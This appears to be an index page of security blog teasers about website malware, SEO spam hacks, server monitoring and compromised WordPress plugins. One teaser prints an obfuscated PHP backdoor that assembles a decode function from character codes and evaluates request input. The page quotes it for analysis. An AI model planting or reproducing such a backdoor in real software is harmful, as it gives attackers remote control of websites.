Website Ransomware – CTB-Locker Goes Blockchain
Denis Sinegubko During the last couple of years, website ransomware has become one of the most actively developing types of malware. After infamous fake anti-viruses, this it the second…
Sucuri – 2016 Redesign
Daniel Cid Update: It was an April fools joke, if you did not realize it by now. The site is back in place. A few weeks ago,…
Beware of Unverified TLS Certificates in PHP & Python
Peter Kankowski Web developers today rely on various third-party APIs. For example, these APIs allow you to accept credit card payments, integrate a social network with your…
Hacked Websites Redirect to Porn from PDF / DOC Links
We write a lot about various blackhat SEO hacks on this blog and most of you are already familiar with such things as doorways, cloaking…
Backdoor Evolution: From Eval to Include
There used to be this backdoor that was mainly uploaded via old Gravity Forms vulnerabilities: < script language=”php” > $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100). chr(101).chr(99).chr(111).chr(100).chr(101); e v a l($a($_REQUEST[sam]));</script>…
Ask Sucuri: How Does Sucuri Clean a Website?
Question: How does Sucuri clean hacked websites? What is the process? We clean a lot of websites, ~ 400 / 500, daily during our normal load. To…
Server Security: Indicators of Compromised Behavior with OSSEC
We leverage OSSEC extensively here at Sucuri to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source…
Fake Rating Rich Snippets
It’s quite a common black hat SEO practice to insert fake rating rich snippets on doorway pages to make them attract more attention on search…
Remote WordPress Brute Force Tools
Just a quick reminder: Don’t use common words and easy character combinations as passwords. Your compromised site can be used to hack third-party sites. A…
When a WordPress Plugin Goes Bad
Update March 7: The WordPress Directory team investigated and mitigated this issue by disconnecting the wooranker account from all plugins, reverting malicious changes in the…
Behind the Malware – Botnet Analysis
Antony Garand While analyzing our website firewall logs we discovered an old vulnerability being retargeted in RevSlider, a popular WordPress plugin. In 2014 / 2015, this led to massive website compromises.…